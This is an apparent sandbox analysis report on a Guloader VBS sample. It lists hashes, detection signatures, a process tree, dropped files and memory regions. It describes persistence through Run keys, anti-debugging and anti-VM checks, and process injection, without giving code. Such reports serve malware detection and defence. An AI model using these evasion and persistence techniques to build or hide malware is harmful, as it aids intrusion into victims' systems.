Analysis

  • max time kernel: 149s
  • max time network: 148s
  • platform: windows7_x64
  • resource: win7-20230220-en
  • resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted: 17/03/2023, 07:25

General

  • Target: 834156efc9ef8abf1fa3ab73c13f512eaf2beb84a2aaec6f7c1e2eaf36fcae54.vbs
  • Size: 1.4MB
  • MD5: 493f1f295b01e6e965b95e92f154f574
  • SHA1: 8be9c7216f94da9079f4a64c89ec71d7c310f8f8
  • SHA256: 834156efc9ef8abf1fa3ab73c13f512eaf2beb84a2aaec6f7c1e2eaf36fcae54
  • SHA512: a61460ddad23d35e7a37239d4ae0ec6bb24fbea7495e895878bba911ae8c84c6965537eaeae30456a69d49d96a7ccd8491ecda1b3a2f57d17595ee63e912ff80
  • SSDEEP: 24576:li8jvyzEb8BK0qlSx58jfpF2sv/4hRu3gqX4Tw4:I8Db8fmxF2MmRs4

Malware Config

Signatures

  • Guloader, Cloudeye
    A shellcode-based downloader first seen in 2020.
  • Adds policy Run key to start application (2 TTPs, 1 IoC)
  • Blocklisted process makes network request (2 IoCs)
  • Checks QEMU agent file (2 TTPs, 2 IoCs)
    Checks presence of QEMU agent, possibly to detect virtualization.
  • Loads dropped DLL (1 IoC)
  • Adds Run key to start application (2 TTPs, 2 IoCs)
  • Legitimate hosting services abused for malware hosting/C2 (1 TTP)
  • Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  • Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  • Suspicious use of SetThreadContext (3 IoCs)
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  • Modifies Internet Explorer settings (1 TTP, 1 IoC)
  • Suspicious behavior: EnumeratesProcesses (15 IoCs)
  • Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  • Suspicious behavior: MapViewOfSection (8 IoCs)
  • Suspicious use of AdjustPrivilegeToken (4 IoCs)
  • Suspicious use of WriteProcessMemory (27 IoCs)

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:1204
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\834156efc9ef8abf1fa3ab73c13f512eaf2beb84a2aaec6f7c1e2eaf36fcae54.vbs"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1336
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:524
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          4⤵
          • Checks QEMU agent file
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:836
          • C:\Program Files (x86)\internet explorer\ieinstal.exe
            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
            5⤵
            • Checks QEMU agent file
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:1728
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Adds policy Run key to start application
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1540
      • C:\Program Files\Mozilla Firefox\Firefox.exe
        "C:\Program Files\Mozilla Firefox\Firefox.exe"
        3⤵
        PID:988

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize: 61KB
    MD5: e71c8443ae0bc2e282c73faead0a6dd3
    SHA1: 0c110c1b01e68edfacaeae64781a37b1995fa94b
    SHA256: 95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72
    SHA512: b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 342B
    MD5: 5b1e521a9838e012df009e51fa1ac60b
    SHA1: 94a27c491edb06c910c9d7a9d6288d7f1767e78e
    SHA256: e6745b945cb1c1ff3a5f7b4b6c70f12bf5eb9ffc733d44ffb1f8c7561bf3098f
    SHA512: ce80df269aece40aadb41032434fb8c21c6b8fc0ae170d13feb9e5d53fd861e499d6e8f1a5708a206c84506e01e4518d7a3819f79d451d15b1ffbec3bba0567c

  • C:\Users\Admin\AppData\Local\Temp\Cab38FC.tmp
    Filesize: 61KB
    MD5: e71c8443ae0bc2e282c73faead0a6dd3
    SHA1: 0c110c1b01e68edfacaeae64781a37b1995fa94b
    SHA256: 95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72
    SHA512: b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

  • C:\Users\Admin\AppData\Local\Temp\k4qt1d.zip
    Filesize: 444KB
    MD5: d71848944418c67f6eb230682f9a969a
    SHA1: 11d37a0eccbaf9995c6b236ff1a99d174a2566bd
    SHA256: efff0464180fcb34ec33e7835086ea58adc84bc3f0b08a7323ef1d58b258e59e
    SHA512: 7baef376fb5f87e43124f79f81fe45567b7926be277a05abbbfe74bdbbe8dc49c238999e432fb4c457dff23ca78915d2a899bdde9a2ee79b77c655c17ebe706d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TXZV7S6ZQM7CK5FAZ0M5.temp
    Filesize: 7KB
    MD5: f815cae08d83ae982d0fef8887550029
    SHA1: 4b06ccc65130f5140525dc6b99f1986292a850ef
    SHA256: e36036835807757aad8018868f4ae8f08eddc483a04c8eab330e1d1c50c2dc79
    SHA512: 10d6de33aa2bf6564b95b056026af71873ba289b10b22b6eb2451185a14ba8e467c624908100992575ca263c945d2e2725c3d7a72e11617329604b80fe0c1acd

  • \Users\Admin\AppData\Local\Temp\sqlite3.dll
    Filesize: 849KB
    MD5: 87f9e5a6318ac1ec5ee05aa94a919d7a
    SHA1: 7a9956e8de89603dba99772da29493d3fd0fe37d
    SHA256: 7705b87603e0d772e1753441001fcf1ac2643ee41bf14a8177de2c056628665c
    SHA512: c45c03176142918e34f746711e83384572bd6a8ed0a005600aa4a18cf22eade06c76eda190b37db49ec1971c4649e086affd19eee108c5f405df27c0c8cb23d2

  • memory/524-79-0x00000000028A0000-0x0000000002920000-memory.dmp (Filesize: 512KB)
  • memory/524-78-0x00000000028A0000-0x0000000002920000-memory.dmp (Filesize: 512KB)
  • memory/524-77-0x00000000022F0000-0x00000000022F8000-memory.dmp (Filesize: 32KB)
  • memory/524-76-0x000000001B1E0000-0x000000001B4C2000-memory.dmp (Filesize: 2.9MB)
  • memory/524-75-0x00000000028A0000-0x0000000002920000-memory.dmp (Filesize: 512KB)
  • memory/524-87-0x00000000028A0000-0x0000000002920000-memory.dmp (Filesize: 512KB)
  • memory/524-88-0x00000000028A0000-0x0000000002920000-memory.dmp (Filesize: 512KB)
  • memory/524-89-0x00000000028A0000-0x0000000002920000-memory.dmp (Filesize: 512KB)
  • memory/524-90-0x00000000028A0000-0x0000000002920000-memory.dmp (Filesize: 512KB)
  • memory/836-86-0x00000000026F0000-0x00000000026F1000-memory.dmp (Filesize: 4KB)
  • memory/836-93-0x0000000002750000-0x0000000002790000-memory.dmp (Filesize: 256KB)
  • memory/836-82-0x0000000002750000-0x0000000002790000-memory.dmp (Filesize: 256KB)
  • memory/836-91-0x0000000002750000-0x0000000002790000-memory.dmp (Filesize: 256KB)
  • memory/836-85-0x0000000005C20000-0x000000000B56D000-memory.dmp (Filesize: 89.3MB)
  • memory/836-84-0x0000000002750000-0x0000000002790000-memory.dmp (Filesize: 256KB)
  • memory/836-83-0x0000000002750000-0x0000000002790000-memory.dmp (Filesize: 256KB)
  • memory/836-92-0x0000000002750000-0x0000000002790000-memory.dmp (Filesize: 256KB)
  • memory/1204-128-0x0000000003FB0000-0x00000000040A6000-memory.dmp (Filesize: 984KB)
  • memory/1204-183-0x00000000063A0000-0x0000000006452000-memory.dmp (Filesize: 712KB)
  • memory/1204-140-0x00000000063A0000-0x0000000006452000-memory.dmp (Filesize: 712KB)
  • memory/1540-135-0x0000000000090000-0x00000000000BD000-memory.dmp (Filesize: 180KB)
  • memory/1540-136-0x0000000000090000-0x00000000000BD000-memory.dmp (Filesize: 180KB)
  • memory/1540-185-0x0000000061E00000-0x0000000061EC1000-memory.dmp (Filesize: 772KB)
  • memory/1540-141-0x0000000001E90000-0x0000000001F1F000-memory.dmp (Filesize: 572KB)
  • memory/1540-130-0x0000000000220000-0x0000000000234000-memory.dmp (Filesize: 80KB)
  • memory/1540-131-0x0000000000220000-0x0000000000234000-memory.dmp (Filesize: 80KB)
  • memory/1540-137-0x0000000002290000-0x0000000002593000-memory.dmp (Filesize: 3.0MB)
  • memory/1540-134-0x0000000000220000-0x0000000000234000-memory.dmp (Filesize: 80KB)
  • memory/1728-123-0x0000000000400000-0x0000000000615000-memory.dmp (Filesize: 2.1MB)
  • memory/1728-126-0x00000000220E0000-0x00000000223E3000-memory.dmp (Filesize: 3.0MB)
  • memory/1728-129-0x0000000001130000-0x0000000006A7D000-memory.dmp (Filesize: 89.3MB)
  • memory/1728-122-0x0000000001130000-0x0000000006A7D000-memory.dmp (Filesize: 89.3MB)
  • memory/1728-125-0x0000000000400000-0x0000000000615000-memory.dmp (Filesize: 2.1MB)
  • memory/1728-121-0x0000000000400000-0x0000000000615000-memory.dmp (Filesize: 2.1MB)
  • memory/1728-97-0x0000000000400000-0x0000000000615000-memory.dmp (Filesize: 2.1MB)
  • memory/1728-94-0x0000000001130000-0x0000000006A7D000-memory.dmp (Filesize: 89.3MB)
  • memory/1728-127-0x00000000001E0000-0x00000000001F0000-memory.dmp (Filesize: 64KB)